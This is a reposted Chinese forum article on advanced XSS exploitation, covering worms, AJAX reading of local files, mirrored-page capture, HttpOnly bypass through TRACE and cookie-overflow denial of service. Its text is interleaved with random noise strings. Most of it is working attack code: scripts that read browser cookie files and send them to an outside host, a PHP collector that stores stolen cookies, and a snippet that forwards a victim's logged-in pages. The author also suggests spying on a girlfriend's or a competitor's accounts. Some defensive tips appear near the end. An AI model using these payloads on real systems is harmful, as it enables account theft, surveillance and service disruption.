中国网络渗透测试联盟

标题: XSS的高级利用部分总结 -蠕虫 [打印本页]

---

作者: admin    时间: 2012-9-13 17:13
标题: XSS的高级利用部分总结 -蠕虫
XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页
本帖最后由 racle 于 2009-5-30 09:19 编辑

7 g- F2 U( z/ O: D. u  V, DXSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页
% M9 j/ H$ c3 J' p8 Z7 y8 v; c+ zBy racle@tian6.com   
4 {" F5 B' T9 khttp://bbs.tian6.com/thread-12711-1-1.html
转帖请保留版权
- A; i4 H+ R5 }% |( H0 h. f

2 z7 W; K8 h4 M- k: k; s5 u
-------------------------------------------前言---------------------------------------------------------


# [" }! i( C% n4 O& H; Z3 h本文将撇开XSS语句,JS脚本,如何无错插入XSS语句,如何过滤和绕过XSS语句过滤,CSRF等知识点.也就是说,你必须已经具备一定XSS知识,才能看懂本文.


9 D0 E. ]; P2 E1 K8 v! o如果你还未具备基础XSS知识,以下几个文章建议拜读:
http://www.lib.tsinghua.edu.cn/chinese/INTERNET/JavaScript/        JavaScript中文简介
- v- o, ^, F7 |+ b# chttp://www.google.com/search?q=XSS+%D3%EF%BE%E4        XSS语句大全
: i2 ~+ S  v( Uhttp://www.google.com/search?q=XSS+%C8%C6%B9%FD        XSS语句绕过
http://www.80vul.com/dzvul/sodb/03/sodb-2008-03.txt        FLASH CSRF
% P, d7 ]! D/ X) [, _6 L7 A0 Ihttp://bbs.tian6.com/thread-12239-1-1.html        突破XSS字符数量限制执行任意JS代码
. ^3 q" N, r3 n$ ?2 ~http://bbs.tian6.com/thread-12241-1-1.html        利用窗口引用漏洞和XSS漏洞实现浏览器劫持
$ L' g* B1 d- D% q/ ?/ D. M

5 I+ m4 L6 p- C6 \$ [# G

如果本文内容在你眼里显得非常陌生,或者难以理解,或者干燥无味,那正代表你对XSS了解甚少.
* a) c* W' m; _+ X" X- T8 i
希望天阳会员本着技术学习为主的精神,真正的学习和掌握每门安全技术.因此,如果你来天阳是因为你想真正学会一些什么东西的话,请静下心来,看懂,看透,实际测试弄通本文.那么你对XSS的驾驭能力,自然大幅提高.
5 ]7 A9 g' K. ?* o6 g
) C3 G/ M3 o8 i+ Q+ w. O如果你认为XSS是无足轻重的问题,只不过是常见的一个弹窗,或者你认为XSS作用域狭窄,或者你认为XSS威力微不足道,那么请先看看以下片段:Twitter遭遇疯狂XSS    6次XSS蠕虫版本变化,
3 g* T5 W: k- {7 K1 k
Baidu xss蠕虫         感染了8700多个blog.媒体影响力,关注度巨大
+ O: X# E* @+ X! _% f- P; B4 o8 u
' E9 _6 A% |5 n/ h$ S* lQQ ZONE,校内网XSS     感染过万QQ ZONE.
$ @! {% Q. C8 f9 a% u% j! S
OWASP MYSPACE XSS蠕虫        20小时内传染一百万用户,最后导致MySpace瘫痪

, e# C1 b) A7 Z* o" k, V8 N..........
复制代码------------------------------------------介绍-------------------------------------------------------------
" d! v6 R$ Z9 f5 C
什么是XSS?XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的.XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性.

1 V+ X0 n2 r8 Z1 G$ K0 _7 z

' p9 P$ e" S5 g% A( d4 h跨站攻击有多种方式,由HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码——例如记录论坛保存的用户信息（Cookie）,由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失.当然,攻击者有时也会在网页中加入一些以.JS 或.VBS为后尾名的代码时,在我们浏览时,同样我们也会被攻击到.

6 f2 U& j7 y+ ?- x+ m* @% U  `1 n

如何寻找,如何绕过各种限制,成功无错的执行XSS代码,我们在这里并不讨论.相关的文章在网上也有很多.
8 b0 _7 {$ g/ i复制代码现今XSS替代了SQL-INJECTION,成为web security课题的首位安全问题.XSS已经成为WEB安全的重要课题.
我们在这里重点探讨以下几个问题:
3 ~' [3 Z9 w, v8 y; B4 |; Y# _
1        通过XSS,我们能实现什么?

  q0 f7 q  e% g$ B' }2        如何通过HTTP-only保护COOKIES. 又如何突破HTTP-only,又如何补救?
5 Q: y! c* @+ d) \1 p
0 [, a" D0 e6 Q7 g9 K! g3        XSS的高级利用和高级综合型XSS蠕虫的可行性?

5 T! B% f7 y- Z2 j6 N0 V4 v; E4        XSS漏洞在输出和输入两个方面怎么才能避免.

7 F6 {! Z" Z# r. _5 H$ ]
0 _* }" ]3 l+ S
------------------------------------------研究正题----------------------------------------------------------


& D9 `. l3 B, q* e0 c8 U5 W2 d( `1 N
& s7 Y/ m: s( D9 A; `通过XSS,我们能实现什么?通过XSS,我们可以获得用户的COOKIES等信息,模拟用户本身进行HTTP提交,读取客户端本地文件,欺骗社工.结合以上功能,我们还能写出综合高级蠕虫.
1 N/ f6 j+ Y+ _% ^/ U( o2 X8 X复制代码XSS的高级利用与及综合性XSS高级蠕虫:我们主要讨论XSS在不同的浏览器下的权限限制&&XSS截屏;镜象网页,http only bypass(Cross-Site Tracing XST).写出我们自己的高级XSS蠕虫
  ^6 Q1 s/ q& i% J复制代码XSS漏洞在输出和输入两个方面怎么才能避免.
+ q' U; }% P/ I. C& F1:为网站各个动态页面分安全等级,划分重点和次重点区域,分等级采用不同的输入限制规则.
" a0 G- z( L; ?( S5 }2:严格控制输入类型,根据实际需求选用数字,字符,特殊格式的限制.
3:在浏览器端输出时对HTML特殊字符进行了转义,常见采用htmlspecialchars,htmlentities.但是过滤了特殊字符,并不意味就是安全的.很多绕过方法都是争对单纯过滤进行的,譬如URL,8进制,16进制,String.fromCharCode转编码,UBB绕过等.因此应注意每处接受动态输入的代码审计.数据保存在innertxt,标签属性均应处于“”内.
4:Http-only可以采用作为COOKIES保护方式之一.
: _2 k8 _' E" L1 U$ I+ r
* x/ e. {0 Q; O
5 ?; _, q2 Z8 E& G+ S) I4 f* W, Y! F# [
. h7 ?, n+ O, ~' T: ~# ?
' r* U7 d3 F/ d0 |3 }6 H9 G
(I) AJAX在不同的浏览器下的本地文件操作权限读取本地的COOKIES,常见的敏感文件如:FTP的INI,etc/shadow,各种第三方应用程序的敏感文件等,并且将内容反馈给攻击者)

$ _8 ^1 a) b  U9 o( q我们可以参考空虚浪子心的两篇文章,与及XEYE TEAM的统计信息:    1: ie6可读取无限制本地文件.ie8以及相应版本的trident内核浏览器对ajax本地执行时的权限控制得很死的，看来MS对IE这类安全风险比较重视。(这有一些问题，随后修正!)

! N& \% W; Z/ t# x5 s8 g1 q7 `
& @3 @( Q' o9 b7 r  j" |% d
! s$ M; f$ O1 d5 J& H8 N. ?    2: ff 3.0.8及以下版本允许本地执行的ajax访问当前目录下的文件内容。其他目录暂无法访问。
8 a% y) i) H' {0 P1 H7 D
, ^" z# N/ [" ^" G9 [* k

3 q$ L% Z4 b% O+ H    3: opera9.64及以下版本允许通过指定url为file://协议进行访问；如果文件在当前目录下，则不需要指定file://协议；如果文件在同一盘符下甚至可以超越目录的方式访问:../../boot.ini。

$ S2 Y! h/ ?" M+ }# C: ^7 P! \
) s$ O& D, _( H2 h( M! Q" [
! Y* l' p0 T# |' X    4: 基于webkit内核：google chrome、遨游3.0、safari等浏览器对本地执行的ajax权限没做任何访问限制.
* q* y% O. b& h( I  f: Z" i复制代码IE6使用ajax读取本地文件    <script>
# ?' j& _) U6 ?, }7 v( r! E4 Z
) p8 D% s; F+ }* b- M* D: E( v    function $(x){return document.getElementById(x)}
; E5 R: L9 W4 o9 \

% ^3 v) X* t. |/ U5 y! ?4 `  f
& D5 L8 [+ ]: f+ n) M2 O  B0 i    function ajax_obj(){

    var request = false;

8 c* h8 }8 G, |% Q! I, X2 Z    if(window.XMLHttpRequest) {

* M, Y  ^! y3 o% x' o% F4 G3 d# |    request = new XMLHttpRequest();

8 p$ d6 B$ B" p- R  H; }: [1 L    } else if(window.ActiveXObject) {

' [- `" X4 r# ^  b    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
. |2 z; f) j2 Q) l+ T
3 ?7 p; M5 p% E6 f
$ W( k1 \1 D; U: n
) A: c( f, T! y    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

    for(var i=0; i<versions.length; i++) {
: S" z; r; T' ]7 B( M7 W& E
; N" s4 T  b2 A# P7 X2 C( q    try {
' {, \+ d0 _1 B4 T5 w
8 @5 N8 A- M% z    request = new ActiveXObject(versions);

    } catch(e) {}
3 [1 e, L4 l/ a  G$ a
    }

    }
( A2 J2 G; \* P4 r  q! [. u( w$ W
# N6 d+ E+ s/ B9 N/ A8 Y    return request;

8 i" B$ Q/ |7 V; \3 ^1 U    }
0 c. `6 L5 _  x" U9 e
    var _x = ajax_obj();
' o' x' y: j+ z4 H: W) H9 {& E
    function _7or3(_m,action,argv){

6 j9 N4 @  q, |- A/ i    _x.open(_m,action,false);
8 N0 j  p' b. I( J7 @. W* O% C
. \( `7 V) P3 @% Y2 v# g7 u    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

! g7 ~, V7 k8 Q9 d6 j) V0 G    _x.send(argv);

    return _x.responseText;

. F2 [: u) ~, l1 U# A* V% E" F    }
9 H1 Q6 W0 W% C8 X! s! i

% G; D0 V( I# d! ^
    var txt=_7or3("GET","file://localhost/C:/11.txt",null);

    alert(txt);

( H3 D4 F$ ^/ P  f4 q# u
4 J, m8 r* N6 \+ _
    </script>
$ V2 w4 W/ X4 f6 S* O1 b复制代码FIREFOX 3使用ajax读取本地文件,仅能读取同目录,及其下属目录下文件.    <script>
# m1 g" Z. U! [
    function $(x){return document.getElementById(x)}



    function ajax_obj(){

    var request = false;
9 F( j! I* H" u) d% t/ i  U
    if(window.XMLHttpRequest) {

# i& ~% T+ V9 }    request = new XMLHttpRequest();
6 M3 @+ [9 q4 A0 k+ \- ^% R* p9 V2 t
+ ~: S" K6 r6 f* o    } else if(window.ActiveXObject) {

    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',

% A; L# W, k; C* ^7 [9 f/ W& F! N
% h- J5 F, o+ P( i, u
    'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

9 ?7 r8 ?9 m7 l3 J/ n1 _- {% B2 C9 p& G* M8 D    for(var i=0; i<versions.length; i++) {
' O* Z" q% ?0 D& N6 }0 x
4 e2 K* B& L. A& t& @: J    try {
; G& G& a. E& _* j6 Q0 c
% t9 u; r6 S2 P* q  n: r& W3 V  O    request = new ActiveXObject(versions);

    } catch(e) {}

    }
# a# T% l8 P  }; ]5 A+ n' W% {- L
( l! M: z( j. U2 e! J    }

% L( C0 a) M9 Q2 N    return request;
3 T% K3 k. d) R/ N0 |& \% X
    }
7 z' @6 p" L( N2 E$ f8 A
    var _x = ajax_obj();
! [: f0 ]* f3 `2 M
4 {( R8 H/ {% H; |7 \1 `    function _7or3(_m,action,argv){
% J0 @# e( X3 ]
    _x.open(_m,action,false);

+ e% u3 e" Q: Y  J$ C. ?0 D3 S    if(_m=="OST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
! h. ]$ t  \% X  |6 ^
    _x.send(argv);

/ j" ^. z- [1 T7 }: M    return _x.responseText;
2 m, ~3 ]: \& F7 T
    }
/ a) u. d8 K1 \2 F; a

  p- [, ~+ C% G2 n8 d
# ?4 C, j, U# R, g( r    var txt=_7or3("GET","1/11.txt",null);

4 P; z1 {) q5 n) Z( L8 i5 r    alert(txt);
4 ]( E4 Q* D! `+ i; p2 W& u, d


4 V9 O! P; m9 P& a( ~. i" C    </script>
复制代码Google Chrome使用ajax读取本地文件Chrome的cookie默认保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies”
4 T1 l1 C6 l6 [

0 d1 A, d, ^7 ^& C7 @& w
5 \1 F7 S+ O+ [& A- DChrome的历史保存在"C:\Documents and Settings\administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History"


  `+ H$ P/ ~+ _4 u3 w6 @3 h
<?   

6 f  R# ?/ V4 z8 \. s: V8 a9 V/*  
$ U/ m- `& Z  m- @+ H  c8 c
' ^2 x7 ^9 t; B9 A: g     Chrome 1.0.154.53 use ajax read local txt file and upload exp  

# W7 P0 K4 Q; S% H4 C0 y6 S     www.inbreak.net   

( o6 T* l7 V% n- D     author voidloafer@gmail.com 2009-4-22   
2 N2 \- q3 m& P: a% k
9 n0 k* ~$ }  W2 p: d     http://www.inbreak.net/kxlzxtest/testxss/a.php get cookie and save.  

% q: P9 w5 o$ M7 H* j! a*/  
2 K( K& z' r, b- S. ?/ W- w$ E
) ~) S# L( ~$ A$ ?# s, dheader("Content-Disposition: attachment;filename=kxlzx.htm");   

header("Content-type: application/kxlzx");   
. G$ m) P& \4 L+ ?! e( `0 g. a
: r7 h6 B4 j( p2 }+ ]" U' z7 }/*  

     set header, so just download html file,and open it at local.  
7 @* p% u5 h- U  E# I! ^# g
6 ], H6 F8 }/ F9 |4 p" E7 }*/  

/ U7 L2 H* p7 Y: e* I  y?>   

( z5 S2 R" q* K3 p! ]<form id="form" action="http://www.inbreak.net/kxlzxtest/testxss/a.php" method="OST">   

     <input id="input" name="cookie" value="" type="hidden">   

  U) H  z' X% N5 r</form>   

+ F- ]5 h0 M/ Z, U<script>   

4 X6 L: \7 Z$ N) M2 j& @function doMyAjax(user)   

{   

  R& J4 o4 k: v+ \+ D5 P3 W% uvar time = Math.random();   
' L- W  B0 q0 k. j" x% Z9 g- S
/*  
& l  F! e' J& G# k
the cookie at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\Default  

and the history at C:\Documents and Settings\kxlzx\Local Settings\Application Data\Google\Chrome\User Data\History  
- ~$ A+ o  v: C% B
! R* C& z% l" h" d% ]8 @8 ^! T  iand so on...  

*/  

- d; n3 c" x4 }' i: \var strPer = 'file://localhost/C:/Documents and Settings/'+user+'/Local Settings/Application Data/Google/Chrome/User Data/Default/Cookies?time='+time;   
4 }; h+ {8 h1 _7 w; ^" e; ~- r/ ~# v
4 R( X; ^  T$ B1 b   

9 V& j, ^5 N2 X  r+ s' n' nstartRequest(strPer);   


3 q& d, W& p$ Y$ x( @
: }& Y2 j5 m6 R" f}   
$ H2 V* k3 m# l! R0 Y" D7 s
, q8 H7 ^5 M  O9 ~$ @0 q   

function Enshellcode(txt)   

{   
/ T8 I; T2 ~* C# I" L0 y
6 _1 I4 h  y: p! hvar url=new String(txt);   

var i=0,l=0,k=0,curl="";   

l= url.length;   
: [! R; I+ b+ j" O
+ ~, D) w( Y3 h& @for(;i<l;i++){   

  H* |: z- q& p2 R+ o% c$ e$ Rk=url.charCodeAt(i);   
! J2 x5 a! [1 K+ `6 a( s- A
if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}   

if (l%2){curl+="00";}else{curl+="0000";}   
  p1 u  C2 _2 v$ W3 @5 i& L
curl=curl.replace(/(..)(..)/g,"%u$2$1");   

' P1 s; G( ]8 r5 R4 C8 e/ sreturn curl;   
: S4 r0 {% o, c$ ^3 |  m0 w3 f- M3 s* t
& {. ]' r$ a! F- _! Q$ W}   
* I( [" e/ y5 z6 O3 X" O2 p5 h
   

   

var xmlHttp;   
+ H& S' z0 C6 I
function createXMLHttp(){   

     if(window.XMLHttpRequest){   

xmlHttp = new XMLHttpRequest();           
2 ]; a  W, l5 \% m/ r5 g! i& H
     }   
+ w' A+ d- ]7 `% a- T% _1 U! M! x
) H0 x3 W' N/ t/ @& o, C7 z; ^) q     else if(window.ActiveXObject){   
$ ~* v* t! b# g: w0 k
" j$ t! K. T7 ]7 P/ Z( A) exmlHttp = new ActiveXObject("Microsoft.XMLHTTP");   

     }   
7 ?5 K" y7 o. X: C# [4 I* P' F5 x4 C
}   
" z  y+ x0 M+ w! C  Q( L# G
   

function startRequest(doUrl){   

5 B7 _6 h- R( V7 L! K0 T: H   

     createXMLHttp();   
: ?1 u; n: ]5 ^4 G
1 N4 m" K! R* F* e/ J' j

     xmlHttp.onreadystatechange = handleStateChange;   

+ m# L% N' x" u; l7 y, M. ?* |

& h- |$ R7 m# t     xmlHttp.open("GET", doUrl, true);   
1 I9 p; s0 ?0 g5 w5 ^
+ z1 q4 l; @* Z; O# B/ i* _

& A4 t. j0 H6 p3 f; t     xmlHttp.send(null);   
; R, K0 c5 B9 \3 j: t6 h

; u% H6 y$ _* L  h
" e4 M* C6 R( O& p$ d6 g

}   
, i7 G  l% W6 l5 A" O
5 K  R. b' Y7 t& i& H   
( U' s0 }. E. V- }, [
$ `/ F3 ]# e* ~; P: }, Qfunction handleStateChange(){   
6 v& Z4 E- t! j
+ y8 X$ p- X& I2 V; h8 I  k     if (xmlHttp.readyState == 4 ){   

     var strResponse = "";   
7 R/ B. H/ |- R2 n
     setTimeout("framekxlzxPost(xmlHttp.responseText)", 3000);   
& c* G0 B3 p4 b. P' v1 b' y
$ n) h9 [6 Q, ?, Q6 N        

     }   
+ H# a' f' r7 I$ P, H
}   
  n3 l1 P) ?' B& s) h+ F1 ^! v
1 A3 D2 b* z8 E! A   
7 y7 C* `* ^( K
6 w  H1 }5 e# o- ], \2 F  g2 X$ A   
& s& z/ \; H5 U* [* i
6 x% U6 m& Z& J8 U( d7 yfunction framekxlzxPost(text)   

{   
+ J/ D& R5 v, ?* ~  e- F) _. t
     document.getElementById("input").value = Enshellcode(text);   

     document.getElementById("form").submit();   
$ G/ j! Z& d" t6 u# g  w. r
! b: I$ w( @" \) i% \! e0 Z6 O}   
) }! B( N; M2 Y1 b- E2 }( o( m
3 u2 B% i- |$ U9 C   
; p, S8 U$ I7 s5 B6 X
doMyAjax("administrator");   

9 V7 ~0 J; \# H% ^% f. v! v   

</script>
复制代码opera 9.52使用ajax读取本地COOKIES文件<script>  
) F5 ~6 S. U+ S* C, D
var xmlHttp;  

function createXMLHttp(){  

     if(window.XMLHttpRequest){  

5 a0 D$ d8 W6 N( x; i         xmlHttp = new XMLHttpRequest();         

     }  

     else if(window.ActiveXObject){  
& P3 e3 T0 V. K
         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  

. N. o# E& p  O/ b) t, D4 L     }  
: L. _6 Q6 X! i  F
}  

   

( L. n! X: W( L# y9 \3 \; |function startRequest(doUrl){  

           

2 G9 o3 A$ l1 R9 f& T- a3 E6 w     createXMLHttp();  

      

     xmlHttp.onreadystatechange = handleStateChange;  
+ }% N9 Q" M3 r/ ~! U2 s
, ^! j# g7 C' Q0 E* t# z$ `) y4 i2 V: C. ^      

     xmlHttp.open("GET", doUrl, true);  

$ J! I; {" d! c  a# B      
, R, L4 p- n" S( P; F& m: d
/ m8 c( S! b8 S. O; ^( v5 i" T/ A6 U     xmlHttp.send(null);  

* b: ?5 }9 w: |& c% J2 e$ |      
/ F( O# o% k* D
7 S9 n) H6 o4 h: _' L      

}   

' r# n3 c. t* p1 y4 l, m: U   

/ P# p( p' f6 w- F, b' Y7 r  B5 gfunction handleStateChange(){  

     if (xmlHttp.readyState == 4 ){  

4 C) M3 q2 T3 w; r, ?2 i& k             var strResponse = "";  

             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   
! `; K+ f$ S0 ^. N2 f9 v  P
+ H$ a. a) q' b' |% p$ I               

& _$ Q  N: I7 X# m     }  

5 D' Z% m0 T3 @& E# v( ^+ {- P}  

: F" ^1 O5 ]7 M2 T# v   

function doMyAjax(user,file)  

7 D& @: x1 O' Q3 Q, E7 |: r{  

% S! X( C7 i. W9 G% ]. X$ Z         var time = Math.random();  
4 J7 W6 Z. _! c5 j; S' d, M
           

         var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  

           

         startRequest(strPer);  

3 N6 v) E2 T; B, N; N      

" [7 M3 f! p: p4 X7 \2 [4 J# \}  

/ F$ |2 [0 u% j* U- ~/ I' _   
: S1 I1 {! W+ z! J7 W
# n' _& W7 z! }. N# Dfunction framekxlzxPost(text)  

{  
1 E: ?, C! f- w5 Q8 e* P
/ {3 j# N+ A# Z* ]( P% q     document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  

     alert(/ok/);  

}  
, v# S! h3 u* R# f$ I4 c; c% _
$ J2 F; k$ E$ f( X4 f1 f   
0 @% t8 E2 N. s3 |! H7 D, W8 z$ `( l/ x
doMyAjax('administrator','administrator@alibaba[1].txt');  
! `4 T. W$ w' R
   

" D" F5 }/ J% i6 M2 N</script>

. e5 Y4 X! x% ], j2 D
7 A1 O' C! D3 C# l
8 A# D% L' @; @- [: Q4 G  E( i6 v/ y

a.php

% B4 x5 j) W! O6 p1 F. M

<?php      

; K& a, j8 b# k   

$user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  
+ ^" O% g9 K# t5 q- w
# }% g2 o* Z. b- ~, f$ O; y$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   
( S! Y; @$ b/ U5 m7 Z
7 Z  a$ D1 m! P: e/ ]5 H! w  
* v- G1 W6 l; n, o
$fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     
* H4 @7 s2 M$ Y/ i3 M
* l& y$ p/ a4 n3 d* N3 Pfwrite($fp,$_GET["cookie"]);      
  y% Q* h* b1 H
9 v; w  F- ^& L' }$ `. xfclose($fp);   
8 n0 h9 A. u) J4 ?2 a8 R$ m
1 B  Y6 M9 c' o6 ~?>
复制代码(II) XSS截屏-镜象网页与XSS实现DDOS:
: f6 Q+ n8 P9 C4 s' A
& \: S' ]4 f/ |: E) j/ g# Z或许你对你女朋友的校内网里的好友列表感兴趣,又或者你对你的客户部竞争对手的电话通信记录感兴趣,那么这个由XEYE TEAM提出的新想法,对你就有用.
& X# F0 J0 q0 u" c6 N) E9 Q) Z利用XSS获得指定的受控者授权状态下的页面源代码,再传发到目标页面,处理好相对路径,那么攻击者就能截取任意一个受控端的授权状态下的镜象网页.达到类似远程控制程序截屏的功能.

代码片段://xmlHttpReq.open("GET","AWebSiteWhichYouNeedToCatch.com",false);

//xmlHttpReq.open("GET","http://friend.xiaonei.com/myfriendlistx.do",false);

  c  ?( n# g6 o2 e' E//xmlHttpReq.open("GET","http://chinatelecom.com/mylistofnopermonth.jsp?no=139xxxxxxxx",false);

# E" B& n" Q! }5 H7 k1 X" mfunction getURL(s) {

var image = new Image();
' f, T% ~1 O$ t0 j
image.style.width = 0;
- l5 ?2 J, Q# p' C: G
2 u$ w4 L8 W$ f& p( b. V! aimage.style.height = 0;
- c& C2 A+ v0 V' k8 b
% B! [; G! f' u( Y( s( simage.src = s;
- ~% b/ E, t0 \9 O2 T0 m  |
' t3 f2 s( }8 H  ^, [}

; l: @4 h' P' z- y( x* ggetURL("http://urwebsite.com/get.php?pagescopies="+xmlHttpReq.responseText);
0 ~( j3 I% Y5 L复制代码XSS也能大材小用DDOS? 利用XSS操作COOKIES,导致HEADER部分过大,引发IIS或APACHE等服务端CRASH或者拒绝响应.生效时长与COOKIES允许保存时间相等.
这里引用大风的一段简单代码:<script language="javascript">

var metastr = "AAAAAAAAAA"; // 10 A

7 s- q/ S6 e" a0 B9 K) Jvar str = "";
& G5 n1 T( ^+ h6 }) m
5 D. l+ B1 ^0 bwhile (str.length < 4000){

    str += metastr;
( ^! H) B3 Z* q- ]: E
6 A9 d9 i% ~! L; s0 R}
6 U" g2 q% Z: w8 h+ |
" d; S$ [4 @) ]5 N6 U, P0 f: n
, w7 M3 g( M: d
8 C8 a- `- K) K$ z  G3 wdocument.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" +";expires=Thu, 18-Apr-2019 08:37:43 GMT;";    // 一些老版本的webserver可能在这里还会存在XSS

; c: I  }4 E. e& y! |</script>
$ z  o+ N* e1 y6 m
7 r" F9 Z) K$ `详细代码请看:http://hi.baidu.com/aullik5/blog ... aeaac0a7866913.html
复制代码如果你觉得XSS用来DDOS太可惜的话,这里也提供另外一篇文章供你参考,随与XSS无关,但是却也挺有意思.
) W; R( O# t& U9 T: u+ Kserver limit ddos利用随想 - 空虚浪子心 http://www.inbreak.net/?action=show&id=150

假设msn.com出现了问题,被XSS了.并且攻击者把COOKIES 设置成yahoo.com的.那么所有访问msn.com的用户将无法访问yahoo.com.
攻击者在自己的网站上iframe了server limit ddos,目标设置为竞争对手myass.com,那么所有访问过攻击者网站的人,将无法访问其同行竞争对手myass.com的网站,这样不很妙么?呵呵.
3 ]9 D( {3 V! w5 l% F/ T* `
0 M9 g% M+ }- _
# d1 `! Q: X! m8 B+ n2 N



(III) Http only bypass 与 补救对策:
9 ]  h( y8 l4 ]6 ~& r, J- x5 }9 R
/ I! I( {0 {8 D& o% W0 @1 x什么是HTTP-ONLY?HTTP-ONLY为Cookie提供了一个新属性，用以阻止客户端脚本访问Cookie.
以下是测试采用HTTPONLY与不采用时,遭受XSS时,COOKIES的保护差别。<script type="text/javascript">

<!--

% e* e% G. J& l- I1 F% m/ J9 m- \function normalCookie() {
4 j, }9 U) \2 J& A/ Y
) E$ ^: Z4 J6 sdocument.cookie = "TheCookieName=CookieValue_httpOnly";

! w2 @- G9 X- V  qalert(document.cookie);

' y& }* \6 A2 b. d5 y}
. T! i- ~1 b; P2 p
6 y$ e8 n) E4 U; t
6 t7 ?3 P' ]; u* _3 T5 x

9 p3 b) J1 R; p/ ?' V+ l) D* G6 `8 \
function httpOnlyCookie() {
0 F- j1 Y4 @, j( D# D9 g7 d) z
6 c" e  X1 T3 K3 E. s. a3 _, J, ndocument.cookie = "TheCookieName=CookieValue_httpOnly; httpOnly";

alert(document.cookie);}

3 e0 x1 X% f( ^+ K) f- r
  j9 |, C7 m3 }. p4 ]
5 [! Q! ?3 m6 C- R& @& O//-->

</script>

7 @1 ^4 d3 F8 A* o& _7 J9 N& W

. w4 h; K' r! J  M<FORM><INPUT TYPE=BUTTON OnClick="normalCookie();" VALUE='Display Normal Cookie'>
  R2 H  q7 R0 ~
<INPUT TYPE=BUTTON OnClick="httpOnlyCookie();" VALUE='Display HTTPONLY Cookie'></FORM>
复制代码但是采用HTPPONLY就安全了吗?不一定.采用TRACE获得HEADER里的COOKIES:<script>
1 I7 }( h0 ?$ P. C+ E3 g/ m, A
" G6 [' T9 h# H( t! ]/ ?- \" w+ t' _% _
% B2 a$ W3 ]$ u
4 Q8 g3 p& ]4 e5 q3 X- bvar request = false;

        if(window.XMLHttpRequest) {
& l2 C2 ]  `4 w' l$ O; L* D. T
            request = new XMLHttpRequest();

            if(request.overrideMimeType) {
" ?1 W5 w# }9 e1 r' N% ~& j- z3 G
                request.overrideMimeType('text/xml');

            }
* V; X3 M% h0 ]
        } else if(window.ActiveXObject) {
' x( X9 Y, k: v# o
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

            for(var i=0; i<versions.length; i++) {
6 T" L& {2 I7 y8 }: T# @% r" t! f
7 d1 v( _& B9 X5 b4 j! I2 P                try {
7 X6 v0 z6 {/ L6 K9 A- Y
: m& R1 E+ {( U" [  a% s/ i                    request = new ActiveXObject(versions);
7 P1 |  J' t1 C  Y$ d7 t6 ?
                } catch(e) {}

. c* l' n( `9 L            }
5 S( b- X) h, H  J; Y8 k) r# q
        }
. D0 r8 g$ a+ u$ G5 k- S
xmlHttp=request;

& p" ]0 n3 d1 yxmlHttp.open("TRACE","http://www.vul.com",false);
/ y( ^9 P# c' y
xmlHttp.send(null);

; {6 b$ R, ?3 |, {. _# l! M  [xmlDoc=xmlHttp.responseText;
/ U- m) f& w/ Z8 S! j- r
alert(xmlDoc);

</script>
1 p1 d" @; T. g( s- p2 E+ A复制代码但是许多网站并不支持TRACE调试命令,那么我们还可以通过访问phpinfo();页面,筛选带有COOKIE的字段值.<script>

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
* c( @/ Q+ x& N9 [7 j2 M- G
XmlHttp.open("GET","http://www.google.com",false);

XmlHttp.setRequestHeader("Host","www.evil.com/collet.php");

XmlHttp.send(null);

8 C4 H5 z  h" Fvar resource=xmlHttp.responseText
& H1 `: j: H. w5 @
% e" b; h: h3 P# C* }3 u2 X/ mresource.search(/cookies/);
9 q# H. i  g/ E/ K) B
8 X3 G4 m) S4 ~( w......................
5 X) b7 }: d! r, F% |0 d+ k
' x& B" S' W0 y8 c</script>
: s% g$ z& B% [1 B
( G& i/ A8 |/ |: u+ n0 u$ ~9 `
/ R1 w4 Q7 q3 ~


如何防止对方采用TRACE访问你的网站?APACHE可以采用.htaccess来Rewrite TRACE请求
" L5 P, O" G: S0 u
  X$ z* D5 g" ~9 a- w[code]

RewriteEngine On

RewriteCond %{REQUEST_METHOD} ^TRACE

RewriteRule .* - [F]

$ U- ]% E/ Q; y' L
8 Q' h$ h' R% p" D- E6 R  q8 Q+ u& I
Squid可以添加以下信息到Squid configuration file (squid.conf),屏蔽TRACE请求
6 V+ f3 T7 a5 V! j( i
